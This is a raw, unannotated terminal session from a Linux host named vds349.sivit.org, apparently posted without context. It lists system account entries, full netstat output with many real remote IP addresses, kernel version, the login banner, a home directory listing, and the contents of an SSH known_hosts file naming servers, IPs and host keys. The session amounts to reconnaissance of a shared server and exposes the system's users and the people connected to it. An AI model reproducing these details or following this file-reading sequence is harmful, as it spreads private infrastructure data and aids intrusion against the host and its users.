stax:x:1001:1001:Stax,,,:/home/stax:/bin/bash
gumbie:x:1002:1002:Rick:/home/gumbie:/bin/bash
index:x:1003:100::/www/:/bin/sh
hlds:x:1004:1004:,,,:/www/servers/steam/:/bin/bash
mailman:x:1005:1003::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:1006:1007::/usr/local/cpanel:/bin/bash
sqlrelay:x:107:1000:SQLRelay administrator,,,:/var/cache/sqlrelay:/bin/bash
rmachine:x:1007:2000::/vhost/home/rmachine/:/bin/bash
ircd:x:1008:1008:IRC Service,,,:/home/ircd:/bin/bash
djdd:x:1011:1011:,,,:/home/djdd:/bin/bash
vhost:x:1012:1999:vhost ruser:/vhost/home/vhost:/bin/sh
stats:x:1010:1010:Irc Statistics,,,:/home/stats:/bin/bash
zlvpn:x:1013:1013:VPN User,,,:/home/zlvpn:/bin/bash
raster:x:1015:1015:,,,:/home/raster:/bin/bash
example:x:1017:2000:vhost admin:/vhost/home/example:/bin/false
darwin:x:1018:1018:Darwin,,,:/home/darwin:/bin/bash
custodis:x:1019:2000:vhost admin:/vhost/home/custodis:/bin/false
jebus:x:1020:1020:,,,:/home/jebus:/bin/bash
stitchup:x:1021:1021:,,,:/home/stitchup:/bin/bash
gumbie.rmachine.net:x:1007:2000:vhost vuser:/vhost/rmachine.net/home/gumbie:/bin/false
tsrp:x:1022:1022:The Specialist Role Play,,,,J00 SuCk:/www/www/tsrp/./www:/bin/bash
catchall.rmachine.net:x:1007:2000:vhost vuser:/vhost/rmachine.net/home/catchall:/bin/false
cyrus:x:1023:1023:,,,:/home/cyrus:/bin/bash
dovecot:x:112:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
test:x:1024:2000:vhost admin:/vhost/home/test:/bin/bash
liveits:x:1026:2000:vhost admin:/vhost/home/liveits:/bin/bash
openca:x:1027:1027:Certificate Authority,,,:/usr/local/openca/openca/var/tmp:/bin/bash
zloche:x:1028:2000:vhost admin:/vhost/home/zloche:/bin/bash
catch-all.zloche.net:x:1028:2000:vhost vuser:/vhost/zloche.net/home/catch-all:/bin/false
stax.zloche.net:x:1028:2000:vhost vuser:/vhost/zloche.net/home/stax:/bin/false
rhopkins.rmachine.net:x:1007:2000:vhost vuser:/vhost/rmachine.net/home/rhopkins:/bin/false
gary.rmachine.net:x:1007:2000:vhost vuser:/vhost/rmachine.net/home/gary:/bin/false
gnomex:x:1029:2000:vhost admin:/vhost/home/gnomex:/bin/bash
testt:x:1030:2000:vhost admin:/vhost/home/testt:/bin/bash
zloche@vds349:~$ netstat -anvp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:5665 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1314 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2082 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8067 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2083 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5668 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6661 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:677 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6662 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6663 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6664 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:873 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6665 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6666 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6668 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6669 0.0.0.0:* LISTEN -
tcp 0 0 80.248.208.223:5678 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22222 0.0.0.0:* LISTEN 10886/php
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5902 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6670 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22223 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2095 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2096 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:10001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6002 0.0.0.0:* LISTEN -
tcp 0 0 80.248.208.223:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:119 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:11000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:952 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:11001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 80.248.208.223:6667 80.248.208.223:38538 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 77.98.229.81:1125 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 83.131.131.162:10302 ESTABLISHED-
tcp 0 0 80.248.208.223:41884 24.34.223.184:1024 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 24.122.237.73:3329 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:22222 70.83.249.59:12477 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:6667 172.212.246.81:57859 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 80.248.208.223:41512 ESTABLISHED-
tcp 0 0 127.0.0.1:55494 127.0.0.1:6667 ESTABLISHED-
tcp 0 0 80.248.208.223:22 24.34.223.184:4305 ESTABLISHED-
tcp 0 0 80.248.208.223:38282 194.109.20.90:6669 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 75.75.191.9:2556 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 125.168.0.33:1039 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 24.76.102.165:62390 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 74.57.155.58:2531 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:38281 194.109.20.90:6667 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 58.104.93.144:45053 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 70.48.129.46:4583 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:22222 24.201.70.50:62965 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:8067 68.184.61.212:42543 ESTABLISHED-
tcp 3601 0 80.248.208.223:5665 76.108.85.21:1572 CLOSE_WAIT -
tcp 0 0 80.248.208.223:22 70.48.129.46:4432 ESTABLISHED-
tcp 0 0 80.248.208.223:44103 80.248.208.223:6667 ESTABLISHED-
tcp 0 0 80.248.208.223:22 70.48.129.46:4431 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 70.55.99.6:1124 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:22222 70.53.135.151:1292 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:6697 125.168.0.33:1058 ESTABLISHED-
tcp 0 0 80.248.208.223:41512 80.248.208.223:6667 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 81.99.189.2:34724 ESTABLISHED-
tcp 0 0 80.248.208.223:38279 194.109.20.90:6660 ESTABLISHED-
tcp 0 67 80.248.208.223:22222 70.83.246.180:4378 ESTABLISHED10886/php
tcp 0 31 80.248.208.223:22222 74.13.208.34:60699 ESTABLISHED10886/php
tcp 0 0 127.0.0.1:8067 80.248.208.223:46652 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 70.81.158.109:62487 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:22222 24.200.15.49:1443 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:6667 212.30.4.249:4677 ESTABLISHED-
tcp 0 275 80.248.208.223:22222 64.228.87.200:61697 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:80 24.200.15.49:1554 ESTABLISHED-
tcp 0 0 127.0.0.1:6667 127.0.0.1:55494 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 83.131.131.162:10323 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 60.242.221.109:1948 ESTABLISHED-
tcp 0 0 80.248.208.223:46652 127.0.0.1:8067 ESTABLISHED-
tcp 0 0 80.248.208.223:38538 80.248.208.223:6667 ESTABLISHED-
tcp 0 0 80.248.208.223:8067 76.108.85.21:1750 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 65.93.158.196:2283 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:6667 80.248.208.223:44103 ESTABLISHED-
tcp 0 0 80.248.208.223:80 24.200.15.49:1552 TIME_WAIT -
tcp 0 0 80.248.208.223:22222 74.59.201.253:2112 ESTABLISHED10886/php
tcp 0 0 80.248.208.223:21 24.34.223.184:1068 ESTABLISHED-
tcp 0 0 80.248.208.223:6667 24.201.70.50:62737 ESTABLISHED-
tcp 0 3392 80.248.208.223:22 76.108.85.21:1578 ESTABLISHED-
tcp 0 0 80.248.208.223:6697 24.34.223.184:3191 ESTABLISHED-
tcp 0 0 80.248.208.223:22222 70.83.122.242:2389 ESTABLISHED10886/php
udp 0 0 0.0.0.0:517 0.0.0.0:* -
udp 0 0 0.0.0.0:518 0.0.0.0:* -
udp 108324 0 0.0.0.0:42533 0.0.0.0:* -
udp 0 0 0.0.0.0:946 0.0.0.0:* -
udp 0 0 80.248.208.223:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:949 0.0.0.0:* -
udp 108324 0 0.0.0.0:40013 0.0.0.0:* -
udp 0 0 0.0.0.0:41167 0.0.0.0:* -
udp 0 0 0.0.0.0:34411 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:37746 0.0.0.0:* -
udp 0 0 0.0.0.0:37747 0.0.0.0:* -
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 9112196 - /tmp/.font-unix/fs7100
unix 2 [ ACC ] STREAM LISTENING 3999890033 - /var/run/saslauthd/mux
unix 2 [ ACC ] STREAM LISTENING 3999897273 - private/error
unix 2 [ ACC ] STREAM LISTENING 3999897280 - private/local
unix 2 [ ACC ] STREAM LISTENING 3999897285 - private/virtual
unix 2 [ ACC ] STREAM LISTENING 3999897289 - private/lmtp
unix 2 [ ACC ] STREAM LISTENING 3999897293 - private/anvil
unix 2 [ ACC ] STREAM LISTENING 3999897297 - private/maildrop
unix 2 [ ACC ] STREAM LISTENING 3999897301 - private/uucp
unix 2 [ ACC ] STREAM LISTENING 3999897305 - private/ifmail
unix 2 [ ACC ] STREAM LISTENING 3999897309 - private/bsmtp
unix 2 [ ACC ] STREAM LISTENING 3999897313 - private/scalemail-backend
unix 2 [ ACC ] STREAM LISTENING 3999897320 - private/vhost
unix 24 [ ] DGRAM 542081106 - /dev/log
unix 2 [ ACC ] STREAM LISTENING 9324263 - /tmp/.X11-unix/X2
unix 2 [ ACC ] STREAM LISTENING 2295970951 - /var/run/courier/authdaemon/socket.tmp
unix 2 [ ACC ] STREAM LISTENING 598177136 - /tmp/ssh-Vstfy29862/agent.29862
unix 2 [ ACC ] STREAM LISTENING 9112403 - /tmp/.X11-unix/X64
unix 2 [ ACC ] STREAM LISTENING 9113222 - /tmp/.X11-unix/X1
unix 2 [ ACC ] STREAM LISTENING 1435304102 - /usr/local/openca.0.9.2/openca/var/tmp/openca_xml_cache
unix 2 [ ACC ] STREAM LISTENING 1435311139 - /usr/local/openca.0.9.2/openca/var/tmp/openca_socket
unix 2 [ ACC ] STREAM LISTENING 3999897226 - public/cleanup
unix 2 [ ACC ] STREAM LISTENING 3999897233 - private/rewrite
unix 2 [ ACC ] STREAM LISTENING 3999897237 - private/bounce
unix 2 [ ACC ] STREAM LISTENING 3999897241 - private/defer
unix 2 [ ACC ] STREAM LISTENING 552689721 - /var/state/pwcheck/pwcheck
unix 2 [ ACC ] STREAM LISTENING 3999897245 - private/trace
unix 2 [ ACC ] STREAM LISTENING 3999897249 - private/verify
unix 2 [ ACC ] STREAM LISTENING 3999897253 - public/flush
unix 2 [ ACC ] STREAM LISTENING 3999897257 - private/proxymap
unix 2 [ ACC ] STREAM LISTENING 3999897261 - private/smtp
unix 2 [ ACC ] STREAM LISTENING 3999897265 - private/relay
unix 2 [ ACC ] STREAM LISTENING 3999897269 - public/showq
unix 2 [ ACC ] STREAM LISTENING 428698068 - /var/run/mysqld/mysqld.sock
unix 2 [ ] DGRAM 602931906 -
unix 3 [ ] STREAM CONNECTED 602931911 - private/proxymap
unix 3 [ ] STREAM CONNECTED 602931895 -
unix 2 [ ] DGRAM 602931888 -
unix 2 [ ] DGRAM 602918597 -
unix 3 [ ] STREAM CONNECTED 602918596 -
unix 3 [ ] STREAM CONNECTED 602918595 -
unix 2 [ ] DGRAM 602662209 -
unix 2 [ ] DGRAM 601179234 -
unix 2 [ ] DGRAM 600605611 -
unix 3 [ ] STREAM CONNECTED 600605610 -
unix 3 [ ] STREAM CONNECTED 600605609 -
unix 2 [ ] DGRAM 600591139 -
unix 3 [ ] STREAM CONNECTED 600591138 -
unix 3 [ ] STREAM CONNECTED 600591137 -
unix 2 [ ] DGRAM 598176846 -
unix 3 [ ] STREAM CONNECTED 598176845 -
unix 3 [ ] STREAM CONNECTED 598176844 -
unix 2 [ ] DGRAM 564664132 -
unix 2 [ ] STREAM CONNECTED 556623057 - /usr/local/openca.0.9.2/openca/var/tmp/openca_xml_cache
unix 3 [ ] STREAM CONNECTED 529935576 -
unix 3 [ ] STREAM CONNECTED 529935575 -
unix 3 [ ] STREAM CONNECTED 529930395 -
unix 3 [ ] STREAM CONNECTED 529930394 -
unix 2 [ ] DGRAM 529857617 -
unix 2 [ ] DGRAM 511902250 -
unix 2 [ ] DGRAM 428698021 -
unix 2 [ ] DGRAM 393033862 -
unix 3 [ ] STREAM CONNECTED 393033854 -
unix 3 [ ] STREAM CONNECTED 393033853 -
unix 3 [ ] STREAM CONNECTED 393033852 -
unix 3 [ ] STREAM CONNECTED 393033851 -
unix 3 [ ] STREAM CONNECTED 393033850 -
unix 3 [ ] STREAM CONNECTED 393033849 -
unix 3 [ ] STREAM CONNECTED 393033848 -
unix 3 [ ] STREAM CONNECTED 393033847 -
unix 3 [ ] STREAM CONNECTED 393033846 -
unix 3 [ ] STREAM CONNECTED 393033845 -
unix 3 [ ] STREAM CONNECTED 393033844 -
unix 3 [ ] STREAM CONNECTED 393033843 -
unix 3 [ ] STREAM CONNECTED 393033842 -
unix 3 [ ] STREAM CONNECTED 393033841 -
unix 3 [ ] STREAM CONNECTED 393033840 -
unix 3 [ ] STREAM CONNECTED 393033839 -
unix 3 [ ] STREAM CONNECTED 393033838 -
unix 3 [ ] STREAM CONNECTED 393033837 -
unix 3 [ ] STREAM CONNECTED 393033836 -
unix 3 [ ] STREAM CONNECTED 393033835 -
unix 3 [ ] STREAM CONNECTED 393033834 -
unix 3 [ ] STREAM CONNECTED 393033833 -
unix 3 [ ] STREAM CONNECTED 393033832 -
unix 3 [ ] STREAM CONNECTED 393033831 -
unix 3 [ ] STREAM CONNECTED 393033830 -
unix 3 [ ] STREAM CONNECTED 393033829 -
unix 3 [ ] STREAM CONNECTED 393033828 -
unix 3 [ ] STREAM CONNECTED 393033827 -
unix 3 [ ] STREAM CONNECTED 393033826 -
unix 3 [ ] STREAM CONNECTED 393033825 -
unix 3 [ ] STREAM CONNECTED 393033824 -
unix 3 [ ] STREAM CONNECTED 393033823 -
unix 3 [ ] STREAM CONNECTED 393033822 -
unix 3 [ ] STREAM CONNECTED 393033821 -
unix 3 [ ] STREAM CONNECTED 393033820 -
unix 3 [ ] STREAM CONNECTED 393033819 -
unix 3 [ ] STREAM CONNECTED 393033818 -
unix 3 [ ] STREAM CONNECTED 393033817 -
unix 3 [ ] STREAM CONNECTED 393033816 -
unix 3 [ ] STREAM CONNECTED 393033815 -
unix 3 [ ] STREAM CONNECTED 393033814 -
unix 3 [ ] STREAM CONNECTED 393033813 -
unix 3 [ ] STREAM CONNECTED 393033812 -
unix 3 [ ] STREAM CONNECTED 393033811 -
unix 3 [ ] STREAM CONNECTED 393033810 -
unix 3 [ ] STREAM CONNECTED 393033809 -
unix 3 [ ] STREAM CONNECTED 393033808 -
unix 3 [ ] STREAM CONNECTED 393033807 -
unix 3 [ ] STREAM CONNECTED 393033806 -
unix 3 [ ] STREAM CONNECTED 393033805 -
unix 3 [ ] STREAM CONNECTED 393033800 -
unix 3 [ ] STREAM CONNECTED 393033799 -
unix 2 [ ] DGRAM 133834838 -
unix 2 [ ] DGRAM 3999897188 -
unix 2 [ ] DGRAM 3999890016 -
unix 2 [ ] DGRAM 3437373849 -
unix 2 [ ] DGRAM 3059743612 -
unix 2 [ ] DGRAM 2295970937 -
unix 2 [ ] DGRAM 2243100966 -
unix 2 [ ] DGRAM 1980801679 -
unix 2 [ ] STREAM CONNECTED 1435311128 -
unix 2 [ ] DGRAM 1435304772 -
unix 3 [ ] STREAM CONNECTED 9324294 - /tmp/.X11-unix/X2
unix 3 [ ] STREAM CONNECTED 9324293 -
unix 3 [ ] STREAM CONNECTED 9324289 - /tmp/.X11-unix/X2
unix 3 [ ] STREAM CONNECTED 9324288 -
unix 3 [ ] STREAM CONNECTED 9324286 - /tmp/.X11-unix/X2
unix 3 [ ] STREAM CONNECTED 9324285 -
unix 3 [ ] STREAM CONNECTED 9324267 - /tmp/.font-unix/fs7100
unix 3 [ ] STREAM CONNECTED 9324266 -
unix 3 [ ] STREAM CONNECTED 9113271 - /tmp/.X11-unix/X1
unix 3 [ ] STREAM CONNECTED 9113270 -
unix 3 [ ] STREAM CONNECTED 9113262 - /tmp/.X11-unix/X1
unix 3 [ ] STREAM CONNECTED 9113261 -
unix 3 [ ] STREAM CONNECTED 9113226 - /tmp/.font-unix/fs7100
unix 3 [ ] STREAM CONNECTED 9113225 -
unix 2 [ ] DGRAM 9112198 -
unix 2 [ ] DGRAM 8438158 -
unix 2 [ ] DGRAM 948 -
netstat: no support for `AF IPX' on this system.
netstat: no support for `AF AX25' on this system.
netstat: no support for `AF X25' on this system.
netstat: no support for `AF NETROM' on this system.
zloche@vds349:~$ uname -a
Linux vds349.sivit.org 2.6.12.6-xenU #1 SMP Fri Feb 24 01:08:35 CET 2006 i686 GNU/Linux
zloche@vds349:~$ cat /etc/i
imapd.conf inittab ips
imapd.conf.dpkg-old inputrc irssi.conf
imlib interchangedisable issue
inetd.conf interfaces issue.net
inetd.conf.vhost.0 ipaddrpool
init.d iproute2
zloche@vds349:~$ cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using
this
system consents to these terms.
zloche@vds349:~$ ls -alh
total 48K
drwxr-x--- 8 zloche vhost 4.0K May 6 13:00 .
drwx--x--x 12 root vhost 4.0K Jun 3 16:33 ..
-rw------- 1 zloche vuser 7.4K Jun 8 23:29 .bash_history
drwxr-xr-x 3 zloche vuser 4.0K Mar 15 20:43 .emacs.d
drwx------ 2 zloche vuser 4.0K May 6 13:20 .irssi
-rw-r--r-- 1 zloche vuser 59 Mar 8 00:57 .login
-rw-r--r-- 1 zloche vuser 46 Mar 8 00:57 .profile
drwx------ 2 zloche vuser 4.0K Jun 6 11:29 .ssh
drwx------ 3 zloche vuser 4.0K Mar 8 03:20 mail
drwxr-xr-x 2 zloche vuser 4.0K Mar 8 00:57 public_html
drwxr-x--- 10 zloche vhost 4.0K Mar 17 16:33 zloche.net
zloche@vds349:~$ cd .ssh
zloche@vds349:~/.ssh$ ls -alh
total 24K
drwx------ 2 zloche vuser 4.0K Jun 6 11:29 .
drwxr-x--- 8 zloche vhost 4.0K May 6 13:00 ..
-rw-r--r-- 1 zloche vuser 4.5K Jun 6 11:29 known_hosts
-rw-r--r-- 1 zloche vuser 4.3K Jun 5 15:42 known_hosts~
zloche@vds349:~/.ssh$ cat known_hosts
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdH
MWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QI
VmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3f
claQaSichE=
74.69.17.126 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5vHP/DNtJSXwf+2YNhLD
9MX2HkcuNqhGNtmJ6/sis9MTAQTEqnTi0Nw4yaoQL0qFM7nZkS8OGQI0X55c0Ud0JEXjb
XuikZEFUtzr2A+up19wewbpMsMRac87r+vtU218ozOUjYuurhJwF58DhrUKLrTwa5hl8p
RFTifSqhrhKCMBdQreHkmR8GoHIohMdkaPyIACKBgAaUDFX4VHoYW7AbJlO/3cJLxWEHo
UkRM9aHi6tfqXt69e8W1LGXCEI83xUyjOT+ndCm3x+w/Scuw7kBrjSYg0CXaxDTR5l8lB
MJAdenr9CFWPMKbeOLrvdAlpPewJ5EKRSxY4sWZqZwaqWQ==
server4,213.251.160.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+
BGB83ed97xlvJYWNm8FeE91nhXx05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdM
YCsDqa89dqNuSl0Mx7/qHPS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4Tlt
UMbrLRHYfAi3HbwGj6bIiuE=
server1.zloche.net,65.92.156.62 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt
Wj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQ
mfdPB300tEh4rcqt7hCvqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3f
mJDENJ/7QKV3qCY3N1WB5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dE
AmNWZnAvsZTGTqqKzpobD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lj
a+wLTlplhGOEazVa+IrXwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
irc.rasterized.net,76.108.85.21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAy
aQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3D
zjz6XxknwMkaYo/KCM+CmTAQqYGj4AwxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBT
aV4qWE5vTIMoa9uz1159D5CpHMuAKU70=
server2,74.14.168.190 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzv
LAHmMtiPCbMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tE
h4rcqt7hCvqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QK
V3qCY3N1WB5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZ
TGTqqKzpobD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhG
OEazVa+IrXwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
server4.zloche.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB8
3ed97xlvJYWNm8FeE91nhXx05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsD
qa89dqNuSl0Mx7/qHPS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbr
LRHYfAi3HbwGj6bIiuE=
70.55.196.23 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPC
bMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hC
vqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1W
B5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpo
bD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+Ir
XwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
70.53.254.248 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiP
CbMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7h
Cvqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1
WB5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzp
obD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+I
rXwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
70.53.253.12 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPC
bMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hC
vqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1W
B5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpo
bD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+Ir
XwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
zokio.com,69.70.67.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApry7VslTBItK
BaxF942eAL6/mz/P9F7XBNUySJEg2uU6N3GfwH5QBo0s1DDS6YAvGTftSYS+9Ix3mr7wA
l6nMQCwcEwiz4j2I3g38dVynfNosgdIIpTwkmuM7ZHogpSoQBs5eEdDW9tK+oZeDQi5N/
g7QGZvFwCSmoEUq/StvqS0N9Wc1H9SSW8Ppe/CWNuFi/eRiX9SrmMHYpj7Yi6IC+FZOKn
9rCeIAlmC6xkVa/6c3Kg0Mc5CG/2j2IqbtQ1E6Jcnzp/Fp8KbuIoje0HgjxP193K7tLUN
gu7+3o0fuQnjJdXD9iIgwNAfamogurF79fkWAZfBNxDxSW5LD//L8w==
70.53.255.87 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPC
bMzwa+jYBcJOEVlE/vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hC
vqzodn7z9RFzmKBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1W
B5HW/aTI+cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpo
bD83VBNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+Ir
XwVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ==
www.zloche.com,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYg
pHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1a
